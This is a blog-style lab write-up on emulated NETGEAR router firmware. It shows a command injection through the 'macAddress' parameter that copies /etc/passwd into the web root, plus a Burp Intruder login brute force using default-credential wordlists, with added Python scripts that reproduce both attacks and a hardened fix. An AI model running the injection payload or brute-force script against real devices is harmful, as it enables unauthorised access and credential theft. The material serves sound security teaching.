Tuesday, May 2, 2017
3 - Command Injection with Burp for NETGEAR router emulated firmware
COMMAND INJECTION WITH BURP FOR NETGEAR ROUTER EMULATED FIRMWARE
- Layout for this exercise:
1 - Introduction
- This exercise is based on the Command Injection vulnerability for NETGEAR devices published here:
http://firmware.re/vulns/acsa-2015-001.php
- The vulnerability affects a wide range of NETGEAR products, including the WNAP320 access point/router:
- One of the affected scripts is boardDataWW.php. It will be analyzed and then attacked through a Command Injection, sending crafted input that takes advantage of the missing input validation:
- The vulnerable section of the script passes the 'macAddress' parameter straight into the PHP function exec(), so any value the client sends ends up in a shell command line:
2 - Setting up the lab
- Unzipping and decompressing the firmware of the NetGear router:
- Extracting the .squashfs file:
- A new folder is extracted:
- Inside, we can find the whole root file system of the firmware, ready to be analyzed:
3 - Analyzing the vulnerable PHP script
- First, let's try to locate the vulnerable script boardDataWW.php, using the command locate:
- Opening boardDataWW.php we find the call to the PHP function exec():
- The parameter 'macAddress' is passed to exec() without being validated against the standard MAC address format (six hexadecimal octets separated by colons):
- Let's see how exec() works:
4 - Intercepting with Burp
- Once the emulated firmware is available (as set up in the previous exercise):
- Going to the affected script:
- Enabling the proxy at the browser:
- Launching Burp:
- Enabling Burp to intercept Client requests and Server responses:
- Sending a fake MAC address:
- The message is intercepted:
5 - Launching the attack
- Sending the request to the Repeater:
- Now, let's craft the MAC address input so that the content of /etc/passwd is copied to a file in the web root, where it can be fetched with the browser. The semicolon ends the command the script intended to run, and the trailing '#' makes the shell ignore whatever follows the injected parameter:
cp /etc/passwd /home/www/passwd # from here it is a comment
- Clicking Go and trying to access passwd from the browser:
- The file passwd is opened and saved:
- The content of /etc/passwd has been leaked, so the attack is successful:
- Also, because Burp has been enabled to intercept the Server responses, the whole content is displayed:
- It is interesting to notice that this attack has been launched against an "emulated firmware", and not against an actual physical device.
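The following script is an added example, not code from the original post or from the firmware. It reproduces the injection mechanism found in sections 3 and 5: a value concatenated into an exec()-style shell command, attacked with the same '; command #' shape as the /etc/passwd payload above, next to a hardened version that validates the MAC address and never goes through a shell. The base command ('printf ...') is an assumption standing in for whatever the real script runs, since the post only shows the exec() call, and 'echo INJECTED' stands in for the cp command.

```python
"""Added example (not from the original post): command injection through a
macAddress parameter, and the fix. The base command is a placeholder."""
import re
import subprocess

# Allowlist for a MAC address: six hex octets separated by colons.
# fullmatch() is used instead of '$' so a trailing newline cannot sneak past.
MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}")


def is_valid_mac(mac: str) -> bool:
    """Return True only for a well-formed colon-separated MAC address."""
    return MAC_RE.fullmatch(mac) is not None


def run_unsafe(mac: str) -> str:
    """Mimic exec("cmd " . $macAddress): the raw value is concatenated into a
    command string that /bin/sh parses. ';' ends the intended command and
    '#' comments out anything the script appended after the parameter."""
    cmd = "printf 'mac=%s\\n' " + mac          # placeholder base command
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout


def run_safe(mac: str) -> str:
    """Hardened version: reject anything that is not a MAC address, and pass
    the value as a single argv element so no shell ever parses it."""
    if not is_valid_mac(mac):
        raise ValueError(f"rejected macAddress: {mac!r}")
    return subprocess.run(["printf", "mac=%s\n", mac],
                          capture_output=True, text=True).stdout


def safe_rejects(mac: str) -> bool:
    """True if run_safe() refuses the given value."""
    try:
        run_safe(mac)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed payload with the same shape as the post's attack; the post
    # used 'cp /etc/passwd /home/www/passwd' where 'echo INJECTED' is here.
    payload = "00:11:22:33:44:55; echo INJECTED #"
    print("unsafe output:", repr(run_unsafe(payload)))
    print("safe output:  ", repr(run_safe("00:11:22:33:44:55")))
    print("safe rejects payload:", safe_rejects(payload))
```

Running it shows the unsafe path printing a second line, INJECTED, that the intended command never produced, while the hardened path refuses the payload outright. In PHP the equivalent fix is a strict regex check on 'macAddress' before exec(), combined with escapeshellarg() on the value.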
2 - Cracking Authentication with Burp for NETGEAR router emulated firmware
CRACKING AUTHENTICATION WITH BURP FOR NETGEAR ROUTER EMULATED FIRMWARE
- Layout for this exercise:
- This exercise is based on the emulation of the NETGEAR firmware performed in a previous exercise:
- Downloading the free edition of Burp Suite in its .JAR file version:
https://portswigger.net/burp/freedownload
- The .JAR file is downloaded:
- Launching the application:
- After accepting all the default options for Burp, let's ensure that the proxy is listening locally (127.0.0.1) on port 8080:
- Also, let's configure Burp so that the interception applies for both the Client requests and the Server responses:
- Now, it is time to enable the proxy at the Firefox browser:
- Let's enter some fake credentials, for instance Username:Password
- Burp intercepts and displays the fake credentials:
- Looking into the tab "HTTP history", right clicking the request and choosing the option "Send to Intruder":
- The attack target is the known one (Firmware emulation with 192.168.0.100 and port 80):
- The attack uses two payload lists, the first one for the username and the second one for the password (Intruder's cluster bomb type, which tries every combination):
- Because this is a simple example, let's provide just 10 possible usernames and 10 possible passwords, for a total of 10x10 = 100 requests.
- For the username (list of 10):
- For the passwords (list of 10):
- As said before, in this simple case the total Request count is 100 (10x10):
- However, in a real scenario, and using the Pro version of Burp Suite (the free edition rate-limits Intruder), large wordlist text files could be provided. Of course, trying many more combinations would make the attack take much longer:
- Starting the attack:
- It is noticeable that the only trial (number 3) with status 200 OK and a different response length (313) corresponds to admin:password, which are the default credentials for the NETGEAR device, meaning that the attack is successful.
- Also, the third trial yields a loginok response message:
- It is interesting to notice that this attack has been launched against an "emulated firmware", and not against an actual physical device.
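The script below is an added example, not part of the original post, that reimplements the Intruder run above in Python so the selection logic is explicit: every username x password pair is sent, and the hit is the response that returns 200 OK with a length different from all the others and carries the loginok marker. Because the post shows only screenshots, the form field names ('username', 'password'), the login path ('/login.php') on the emulated device at 192.168.0.100 and the exact wordlists are assumptions; the fake device used for the offline run is constructed for this example.

```python
"""Added example (not from the original post): cluster-bomb login brute force
with status/length outlier detection, as done with Burp Intruder."""
import itertools
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter

# Constructed 10x10 wordlists, as in the post; admin:password is the default.
USERNAMES = ["admin", "root", "user", "guest", "netgear", "support",
             "test", "operator", "manager", "Username"]
PASSWORDS = ["password", "admin", "1234", "netgear", "root", "guest",
             "12345678", "letmein", "qwerty", "Password"]


def http_sender(url, user_field="username", pw_field="password"):
    """Return send(user, pw) that POSTs one credential pair to the target.
    Field names and URL are assumptions; adjust them to the intercepted request."""
    def send(user, pw):
        data = urllib.parse.urlencode({user_field: user, pw_field: pw}).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:
            return err.code, err.read()
    return send


def fake_sender(valid=("admin", "password")):
    """Constructed offline stand-in for the device: one pair logs in,
    every other pair gets the same failure page (same length)."""
    def send(user, pw):
        if (user, pw) == valid:
            return 200, b"<html>loginok</html>"
        return 200, b"<html>login failed, try again</html>"
    return send


def brute_force(send, usernames, passwords, marker=b"loginok"):
    """Send every pair; return (results, hits).

    results: (request_no, user, pw, status, length) in Intruder order.
    hits:    (request_no, user, pw) for responses with status 200, a length
             that is not the most common one (the odd one out, which is what
             sorting Intruder results by length exposes) and the marker."""
    results, bodies = [], []
    for no, (user, pw) in enumerate(itertools.product(usernames, passwords), 1):
        status, body = send(user, pw)
        results.append((no, user, pw, status, len(body)))
        bodies.append(body)
    common_len = Counter(r[4] for r in results).most_common(1)[0][0]
    hits = [(no, u, p) for (no, u, p, st, ln), body in zip(results, bodies)
            if st == 200 and ln != common_len and marker in body]
    return results, hits


if __name__ == "__main__":
    results, hits = brute_force(fake_sender(), USERNAMES, PASSWORDS)
    print(len(results), "requests sent; candidate credentials:", hits)
    # Against the emulated firmware (assumed URL and field names):
    # results, hits = brute_force(http_sender("http://192.168.0.100/login.php"),
    #                             USERNAMES, PASSWORDS)
```

The length-outlier rule is the same heuristic applied by hand in the Intruder table above; it breaks down if the application pads or randomizes responses, in which case the marker string (or a redirect/cookie difference) has to carry the decision on its own.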